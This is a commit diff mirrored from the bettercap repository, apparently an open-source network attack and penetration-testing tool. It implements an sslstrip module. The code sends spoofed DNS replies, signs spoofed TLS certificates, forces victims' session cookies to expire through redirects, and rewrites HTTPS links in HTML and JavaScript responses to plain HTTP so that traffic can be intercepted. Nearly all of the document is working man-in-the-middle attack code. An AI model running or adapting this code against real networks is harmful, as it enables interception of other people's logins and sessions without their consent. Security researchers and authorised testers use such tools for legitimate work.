mirror of https://github.com/bettercap/bettercap, synced 2025-08-19 13:09:49 -07:00
new: implemented sslstrip (ref #154)
This commit is contained in:
parent d8223d9579
commit 2a601e1412
6 changed files with 231 additions and 203 deletions
@@ -134,6 +134,7 @@ func (s *DNSSpoofer) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp *
 		return
 	}
 
+	var eType layers.EthernetType
 	var ipv6 bool
 
 	if nlayer.LayerType() == layers.LayerTypeIPv4 {
@@ -141,18 +142,20 @@ func (s *DNSSpoofer) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp *
 		src = pip.DstIP
 		dst = pip.SrcIP
 		ipv6 = false
+		eType = layers.EthernetTypeIPv4
 
 	} else {
 		pip := pkt.Layer(layers.LayerTypeIPv6).(*layers.IPv6)
 		src = pip.DstIP
 		dst = pip.SrcIP
 		ipv6 = true
+		eType = layers.EthernetTypeIPv6
 	}
 
 	eth := layers.Ethernet{
 		SrcMAC:       peth.DstMAC,
 		DstMAC:       target,
-		EthernetType: layers.EthernetTypeIPv6,
+		EthernetType: eType,
 	}
 
 	answers := make([]layers.DNSResourceRecord, 0)

@@ -161,7 +161,7 @@ func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *goproxy.ProxyCt
 
 		cert := getCachedCert(hostname, port)
 		if cert == nil {
-			log.Info("Creating spoofed certificate for %s:%d", core.Yellow(hostname), port)
+			log.Debug("Creating spoofed certificate for %s:%d", core.Yellow(hostname), port)
 			cert, err = btls.SignCertificateForHost(ca, hostname, port)
 			if err != nil {
 				log.Warning("Cannot sign host certificate with provided CA: %s", err)

modules/http_proxy_base_cookietracker.go (new file, 84 lines)
@@ -0,0 +1,84 @@
+package modules
+
+import (
+	"fmt"
+	"net/http"
+	"strings"
+	"sync"
+
+	"github.com/bettercap/bettercap/log"
+
+	"github.com/elazarl/goproxy"
+	"github.com/jpillora/go-tld"
+)
+
+type CookieTracker struct {
+	sync.RWMutex
+	set map[string]bool
+}
+
+func NewCookieTracker() *CookieTracker {
+	return &CookieTracker{
+		set: make(map[string]bool),
+	}
+}
+
+func (t *CookieTracker) domainOf(req *http.Request) string {
+	if parsed, err := tld.Parse(req.Host); err != nil {
+		log.Warning("Could not parse host %s: %s", req.Host, err)
+		return req.Host
+	} else {
+		return fmt.Sprintf("%s.%s", parsed.Domain, parsed.TLD)
+	}
+}
+
+func (t *CookieTracker) keyOf(req *http.Request) string {
+	client := strings.Split(req.RemoteAddr, ":")[0]
+	domain := t.domainOf(req)
+	return fmt.Sprintf("%s-%s", client, domain)
+}
+
+func (t *CookieTracker) IsClean(req *http.Request) bool {
+	t.RLock()
+	defer t.RUnlock()
+
+	// we only clean GET requests
+	if req.Method != "GET" {
+		return true
+	}
+
+	// does the request have any cookie?
+	cookie := req.Header.Get("Cookie")
+	if cookie == "" {
+		return true
+	}
+
+	// was it already processed?
+	if _, found := t.set[t.keyOf(req)]; found == true {
+		return true
+	}
+
+	// unknown session cookie
+	return false
+}
+
+func (t *CookieTracker) Track(req *http.Request) {
+	t.Lock()
+	defer t.Unlock()
+	t.set[t.keyOf(req)] = true
+}
+
+func (t *CookieTracker) Expire(req *http.Request) *http.Response {
+	domain := t.domainOf(req)
+	redir := goproxy.NewResponse(req, "text/plain", 302, "")
+
+	for _, c := range req.Cookies() {
+		redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, domain))
+		redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, c.Domain))
+	}
+
+	redir.Header.Add("Location", req.URL.String())
+	redir.Header.Add("Connection", "close")
+
+	return redir
+}
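
For orientation, a minimal usage sketch of the new CookieTracker as seen from a request filter, assuming the snippet lives in the same modules package; exampleCookieFilter is a hypothetical name, not code from this commit:

package modules

import "net/http"

// exampleCookieFilter is a hypothetical helper, not part of the commit.
func exampleCookieFilter(cookies *CookieTracker, req *http.Request) (*http.Request, *http.Response) {
	if cookies.IsClean(req) == false {
		// unknown session cookie seen over plain HTTP: remember this
		// client/domain pair and reply with a 302 that expires every
		// cookie the client sent.
		cookies.Track(req)
		return req, cookies.Expire(req)
	}
	// clean (or already processed) request: let it through untouched.
	return req, nil
}

The 302 points back to the same URL, so the browser retries the request without the now-expired cookies; tracking the client/domain pair first is what keeps this from happening more than once.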
@@ -13,11 +13,6 @@ import (
 func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
 	log.Debug("(%s) < %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path)
 
-	// sslstrip preprocessing, takes care of:
-	//
-	// - patching / removing security related headers
-	// - making unknown session cookies expire
-	// - handling stripped domains
 	redir := p.stripper.Preprocess(req, ctx)
 	if redir != nil {
 		// we need to redirect the user in order to make

modules/http_proxy_base_hosttracker.go (new file, 62 lines)
@@ -0,0 +1,62 @@
+package modules
+
+import (
+	"net"
+	"sync"
+
+	"github.com/bettercap/bettercap/log"
+)
+
+type Host struct {
+	Hostname string
+	Address  net.IP
+	Resolved sync.WaitGroup
+}
+
+func NewHost(name string) *Host {
+	h := &Host{
+		Hostname: name,
+		Address:  nil,
+		Resolved: sync.WaitGroup{},
+	}
+
+	h.Resolved.Add(1)
+	go func(ph *Host) {
+		defer ph.Resolved.Done()
+		if addrs, err := net.LookupIP(ph.Hostname); err == nil && len(addrs) > 0 {
+			ph.Address = make(net.IP, len(addrs[0]))
+			copy(ph.Address, addrs[0])
+		} else {
+			log.Error("Could not resolve %s: %s", ph.Hostname, err)
+			ph.Address = nil
+		}
+	}(h)
+
+	return h
+}
+
+type HostTracker struct {
+	sync.RWMutex
+	hosts map[string]*Host
+}
+
+func NewHostTracker() *HostTracker {
+	return &HostTracker{
+		hosts: make(map[string]*Host, 0),
+	}
+}
+
+func (t *HostTracker) Track(host, stripped string) {
+	t.Lock()
+	defer t.Unlock()
+	t.hosts[stripped] = NewHost(host)
+}
+
+func (t *HostTracker) Unstrip(stripped string) *Host {
+	t.RLock()
+	defer t.RUnlock()
+	if host, found := t.hosts[stripped]; found == true {
+		return host
+	}
+	return nil
+}
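
Likewise, a small hypothetical sketch (not part of the commit) of how the tracker above is meant to be driven: Track registers the stripped name and starts the background lookup inside NewHost, Unstrip maps it back, and Resolved.Wait can block until net.LookupIP has finished. The host names below are placeholders, as is the function name:

package modules

import "fmt"

// exampleHostTracking is a hypothetical helper, not part of the commit.
func exampleHostTracking() {
	hosts := NewHostTracker()

	// "wwwww.example.com" stands in for whatever stripped variant the
	// sslstripper produced for the original host.
	hosts.Track("www.example.com", "wwwww.example.com")

	if host := hosts.Unstrip("wwwww.example.com"); host != nil {
		host.Resolved.Wait() // block until the background net.LookupIP is done
		fmt.Printf("%s resolved to %v\n", host.Hostname, host.Address)
	}
}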

@@ -7,7 +7,6 @@ import (
 	"net/http"
 	"regexp"
 	"strings"
-	"sync"
 
 	"github.com/bettercap/bettercap/core"
 	"github.com/bettercap/bettercap/log"
@@ -18,7 +17,6 @@ import (
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
-	"github.com/jpillora/go-tld"
 )
 
 var (
@@ -31,108 +29,11 @@ var (
 	}
 )
 
-type cookieTracker struct {
-	sync.RWMutex
-	set map[string]bool
-}
-
-func NewCookieTracker() *cookieTracker {
-	return &cookieTracker{
-		set: make(map[string]bool),
-	}
-}
-
-func (t *cookieTracker) domainOf(req *http.Request) string {
-	if parsed, err := tld.Parse(req.Host); err != nil {
-		log.Warning("Could not parse host %s: %s", req.Host, err)
-		return req.Host
-	} else {
-		return parsed.Domain + "." + parsed.TLD
-	}
-}
-
-func (t *cookieTracker) keyOf(req *http.Request) string {
-	client := strings.Split(req.RemoteAddr, ":")[0]
-	domain := t.domainOf(req)
-	return fmt.Sprintf("%s-%s", client, domain)
-}
-
-func (t *cookieTracker) IsClean(req *http.Request) bool {
-	t.RLock()
-	defer t.RUnlock()
-
-	// we only clean GET requests
-	if req.Method != "GET" {
-		return true
-	}
-
-	// does the request have any cookie?
-	cookie := req.Header.Get("Cookie")
-	if cookie == "" {
-		return true
-	}
-
-	// was it already processed?
-	if _, found := t.set[t.keyOf(req)]; found == true {
-		return true
-	}
-
-	// unknown session cookie
-	return false
-}
-
-func (t *cookieTracker) Track(req *http.Request) {
-	t.Lock()
-	defer t.Unlock()
-	t.set[t.keyOf(req)] = true
-}
-
-func (t *cookieTracker) Expire(req *http.Request) *http.Response {
-	domain := t.domainOf(req)
-	redir := goproxy.NewResponse(req, "text/plain", 302, "")
-
-	for _, c := range req.Cookies() {
-		redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, domain))
-		redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, c.Domain))
-	}
-
-	redir.Header.Add("Location", req.URL.String())
-	redir.Header.Add("Connection", "close")
-
-	return redir
-}
-
-type hostTracker struct {
-	sync.RWMutex
-	hosts map[string]string
-}
-
-func NewHostTracker() *hostTracker {
-	return &hostTracker{
-		hosts: make(map[string]string, 0),
-	}
-}
-
-func (t *hostTracker) Track(host, stripped string) {
-	t.Lock()
-	defer t.Unlock()
-	t.hosts[stripped] = host
-}
-
-func (t *hostTracker) Unstrip(stripped string) string {
-	t.RLock()
-	defer t.RUnlock()
-	if original, found := t.hosts[stripped]; found == true {
-		return original
-	}
-	return ""
-}
-
 type SSLStripper struct {
 	enabled       bool
 	session       *session.Session
-	cookies       *cookieTracker
-	hosts         *hostTracker
+	cookies       *CookieTracker
+	hosts         *HostTracker
 	handle        *pcap.Handle
 	pktSourceChan chan gopacket.Packet
 }
@@ -161,7 +62,7 @@ func (s *SSLStripper) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp
 		who = t.String()
 	}
 
-	log.Info("[%s] Sending spoofed DNS reply for %s %s to %s.", core.Green("dns"), core.Red(domain), core.Dim(redir), core.Bold(who))
+	log.Debug("[%s] Sending spoofed DNS reply for %s %s to %s.", core.Green("dns"), core.Red(domain), core.Dim(redir), core.Bold(who))
 
 	var err error
 	var src, dst net.IP
@@ -172,25 +73,14 @@ func (s *SSLStripper) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp
 		return
 	}
 
-	var ipv6 bool
-
-	if nlayer.LayerType() == layers.LayerTypeIPv4 {
-		pip := pkt.Layer(layers.LayerTypeIPv4).(*layers.IPv4)
-		src = pip.DstIP
-		dst = pip.SrcIP
-		ipv6 = false
-
-	} else {
-		pip := pkt.Layer(layers.LayerTypeIPv6).(*layers.IPv6)
-		src = pip.DstIP
-		dst = pip.SrcIP
-		ipv6 = true
-	}
+	pip := pkt.Layer(layers.LayerTypeIPv4).(*layers.IPv4)
+	src = pip.DstIP
+	dst = pip.SrcIP
 
 	eth := layers.Ethernet{
 		SrcMAC:       peth.DstMAC,
 		DstMAC:       target,
-		EthernetType: layers.EthernetTypeIPv6,
+		EthernetType: layers.EthernetTypeIPv4,
 	}
 
 	answers := make([]layers.DNSResourceRecord, 0)
@@ -214,50 +104,26 @@ func (s *SSLStripper) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp
 		Answers:      answers,
 	}
 
+	ip4 := layers.IPv4{
+		Protocol: layers.IPProtocolUDP,
+		Version:  4,
+		TTL:      64,
+		SrcIP:    src,
+		DstIP:    dst,
+	}
+
+	udp := layers.UDP{
+		SrcPort: pudp.DstPort,
+		DstPort: pudp.SrcPort,
+	}
+
+	udp.SetNetworkLayerForChecksum(&ip4)
+
 	var raw []byte
-
-	if ipv6 == true {
-		ip6 := layers.IPv6{
-			Version:    6,
-			NextHeader: layers.IPProtocolUDP,
-			HopLimit:   64,
-			SrcIP:      src,
-			DstIP:      dst,
-		}
-
-		udp := layers.UDP{
-			SrcPort: pudp.DstPort,
-			DstPort: pudp.SrcPort,
-		}
-
-		udp.SetNetworkLayerForChecksum(&ip6)
-
-		err, raw = packets.Serialize(&eth, &ip6, &udp, &dns)
-		if err != nil {
-			log.Error("Error serializing packet: %s.", err)
-			return
-		}
-	} else {
-		ip4 := layers.IPv4{
-			Protocol: layers.IPProtocolUDP,
-			Version:  4,
-			TTL:      64,
-			SrcIP:    src,
-			DstIP:    dst,
-		}
-
-		udp := layers.UDP{
-			SrcPort: pudp.DstPort,
-			DstPort: pudp.SrcPort,
-		}
-
-		udp.SetNetworkLayerForChecksum(&ip4)
-
-		err, raw = packets.Serialize(&eth, &ip4, &udp, &dns)
-		if err != nil {
-			log.Error("Error serializing packet: %s.", err)
-			return
-		}
+	err, raw = packets.Serialize(&eth, &ip4, &udp, &dns)
+	if err != nil {
+		log.Error("Error serializing packet: %s.", err)
+		return
 	}
 
 	log.Debug("Sending %d bytes of packet ...", len(raw))
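
For reference, here is a self-contained sketch of the Ethernet/IPv4/UDP/DNS stack the hunk above serializes, written against plain gopacket rather than bettercap's packets.Serialize helper; the MAC/IP/port values and the buildSpoofedReply name are made up for illustration:

package main

import (
	"fmt"
	"net"

	"github.com/google/gopacket"
	"github.com/google/gopacket/layers"
)

// buildSpoofedReply assembles a forged DNS "A" answer and serializes it.
func buildSpoofedReply(srcMAC, dstMAC net.HardwareAddr, src, dst, answer net.IP, qname string) ([]byte, error) {
	eth := layers.Ethernet{SrcMAC: srcMAC, DstMAC: dstMAC, EthernetType: layers.EthernetTypeIPv4}
	ip4 := layers.IPv4{Version: 4, TTL: 64, Protocol: layers.IPProtocolUDP, SrcIP: src, DstIP: dst}
	udp := layers.UDP{SrcPort: 53, DstPort: 40000}
	udp.SetNetworkLayerForChecksum(&ip4)

	dns := layers.DNS{
		QR: true, // this is a response
		Answers: []layers.DNSResourceRecord{{
			Name:  []byte(qname),
			Type:  layers.DNSTypeA,
			Class: layers.DNSClassIN,
			TTL:   1024,
			IP:    answer,
		}},
	}

	buf := gopacket.NewSerializeBuffer()
	opts := gopacket.SerializeOptions{FixLengths: true, ComputeChecksums: true}
	if err := gopacket.SerializeLayers(buf, opts, &eth, &ip4, &udp, &dns); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

func main() {
	srcMAC, _ := net.ParseMAC("00:11:22:33:44:55")
	dstMAC, _ := net.ParseMAC("66:77:88:99:aa:bb")
	raw, err := buildSpoofedReply(srcMAC, dstMAC,
		net.ParseIP("192.168.1.1"), net.ParseIP("192.168.1.10"),
		net.ParseIP("192.168.1.1"), "www.example.com")
	fmt.Println(len(raw), err)
}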
@@ -280,12 +146,8 @@ func (s *SSLStripper) onPacket(pkt gopacket.Packet) {
 		for _, q := range dns.Questions {
 			domain := string(q.Name)
 			original := s.hosts.Unstrip(domain)
-			if original != "" {
-				if address, err := net.LookupIP(original); err == nil && len(address) > 0 {
-					s.dnsReply(pkt, eth, udp, domain, address[0], dns, eth.SrcMAC)
-				} else {
-					log.Error("Could not resolve %s: %s", original, err)
-				}
+			if original != nil && original.Address != nil {
+				s.dnsReply(pkt, eth, udp, domain, original.Address, dns, eth.SrcMAC)
 			}
 		}
 	}
@@ -355,35 +217,11 @@ func (s *SSLStripper) stripResponseHeaders(res *http.Response) {
 	res.Header.Set("Access-Control-Allow-Headers", "*")
 }
 
-// sslstrip preprocessing, takes care of:
-//
-// - patching / removing security related headers
-// - making unknown session cookies expire
-// - handling stripped domains
-func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
-	if s.enabled == false {
-		return
-	}
-
-	// preprocess request headers
-	s.stripRequestHeaders(req)
-
-	// check if we need to redirect the user in order
-	// to make unknown session cookies expire
-	if s.cookies.IsClean(req) == false {
-		log.Info("[%s] Sending expired cookies for %s to %s", core.Green("sslstrip"), core.Yellow(req.Host), req.RemoteAddr)
-		s.cookies.Track(req)
-		redir = s.cookies.Expire(req)
-	}
-
-	return
-}
-
-func (s *SSLStripper) isHTML(res *http.Response) bool {
+func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
 	for name, values := range res.Header {
 		for _, value := range values {
 			if name == "Content-Type" {
-				return strings.HasPrefix(value, "text/html")
+				return strings.HasPrefix(value, "text/") || strings.Contains(value, "javascript")
 			}
 		}
 	}
@@ -414,10 +252,43 @@ func (s *SSLStripper) processURL(url string) string {
 	return url
 }
 
+// sslstrip preprocessing, takes care of:
+//
+// - patching / removing security related headers
+// - handling stripped domains
+// - making unknown session cookies expire
+func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
+	if s.enabled == false {
+		return
+	}
+
+	// preprocess request headers
+	s.stripRequestHeaders(req)
+
+	// handle stripped domains
+	original := s.hosts.Unstrip(req.Host)
+	if original != nil {
+		log.Info("[%s] Replacing host %s with %s in request from %s", core.Green("sslstrip"), core.Bold(req.Host), core.Yellow(original.Hostname), req.RemoteAddr)
+		req.Host = original.Hostname
+		req.URL.Host = original.Hostname
+		req.Header.Set("Host", original.Hostname)
+	}
+
+	// check if we need to redirect the user in order
+	// to make unknown session cookies expire
+	if s.cookies.IsClean(req) == false {
+		log.Info("[%s] Sending expired cookies for %s to %s", core.Green("sslstrip"), core.Yellow(req.Host), req.RemoteAddr)
+		s.cookies.Track(req)
+		redir = s.cookies.Expire(req)
+	}
+
+	return
+}
+
 func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
 	if s.enabled == false {
 		return
-	} else if s.isHTML(res) == false {
+	} else if s.isContentStrippable(res) == false {
 		return
 	}
 
@@ -434,12 +305,25 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
 	body := string(raw)
 	urls := make(map[string]string, 0)
 	matches := httpsLinksParser.FindAllString(body, -1)
-	for _, url := range matches {
-		urls[url] = s.processURL(url)
+	for _, u := range matches {
+		// make sure we only strip stuff we're able to
+		// resolve and process
+		if strings.ContainsRune(u, '.') == true {
+			urls[u] = s.processURL(u)
+		}
+	}
+
+	nurls := len(urls)
+	if nurls > 0 {
+		plural := "s"
+		if nurls == 1 {
+			plural = ""
+		}
+		log.Info("[%s] Stripping %d SSL link%s from %s", core.Green("sslstrip"), nurls, plural, core.Bold(res.Request.Host))
 	}
 
 	for url, stripped := range urls {
-		log.Info("Stripping url %s to %s", core.Bold(url), core.Yellow(stripped))
+		log.Debug("Stripping url %s to %s", core.Bold(url), core.Yellow(stripped))
 
 		body = strings.Replace(body, url, stripped, -1)
 
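
Finally, a rough standalone sketch of what the body rewriting above amounts to; the regular expression and the plain https-to-http downgrade are illustrative stand-ins, not the module's actual httpsLinksParser / processURL logic:

package main

import (
	"fmt"
	"regexp"
	"strings"
)

// httpsLinks is an illustrative stand-in for the module's httpsLinksParser.
var httpsLinks = regexp.MustCompile(`https://[^"'\s]+`)

// stripBody downgrades every https:// link that looks resolvable, roughly
// mirroring the loop in the hunk above (the real code maps each link through
// processURL and tracks the stripped hosts instead of a plain replace).
func stripBody(body string) string {
	for _, u := range httpsLinks.FindAllString(body, -1) {
		if strings.ContainsRune(u, '.') {
			body = strings.Replace(body, u, strings.Replace(u, "https://", "http://", 1), -1)
		}
	}
	return body
}

func main() {
	fmt.Println(stripBody(`<a href="https://www.example.com/login">sign in</a>`))
}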